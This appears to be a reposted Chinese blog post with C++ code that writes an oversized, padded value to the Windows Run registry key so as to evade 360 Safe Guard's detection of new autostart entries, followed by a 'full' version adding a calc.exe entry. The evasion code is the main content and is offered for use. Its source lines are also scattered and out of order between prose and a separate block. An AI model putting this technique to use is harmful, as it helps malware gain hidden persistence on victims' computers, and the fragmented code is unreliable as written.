绕过360安全卫士写自启动项 360安全卫士是通过轮询比较当前自启动项与先前保存的自启动项的差别来检测自启动项的增加的,一段的方法绕过它可能不是那么容易。 下面贴段代码,可以绕过360安全卫士写自启动项。 源程序: #include "stdafx.h" int _tmain(int argc, _TCHAR* argv[]) ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey); Path=new char[1024*1024]; ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path)); return 0; 有人说用上面的代码虽然过了360,但程序没自启动,我只想说我本来是提供一个思路的,算了,还是全爆吧,上帝原谅我.... int _tmain(int argc, _TCHAR* argv[]) ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey); Path=new char[1024*1024]; ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path)); strcpy(Path,"c:\\windows\\system32\\calc.exe"); return 0;
#include <windows.h>
{
HKEY hKey;
char *Path,*Path2="c:\\windows\\notepad.exe --";
LONG ret;
if(ret)
{
printf("打开注册表项失败");
return 0;
}
memset(Path,'p',1024*1024);
memcpy(Path,Path2,strlen(Path2));
if(ret==0)
{
printf("写入成功");
}
else
{
printf("写入失败");
}
}
{
HKEY hKey;
char *Path,*Path2="c:\\windows\\notepad.exe --";
LONG ret;
if(ret)
{
printf("打开注册表项失败");
return 0;
}
memset(Path,'p',1024*1024);
memcpy(Path,Path2,strlen(Path2));
if(ret==0)
{
printf("写入成功");
}
else
{
printf("写入失败");
}
ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
printf("写入成功");
}
else
{
printf("写入失败");
}
}
绕过360安全卫士写自启动项
精选 转载上一篇:服务进程创建一个带窗口的进程
下一篇:卡巴斯基杀毒软件源代码
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章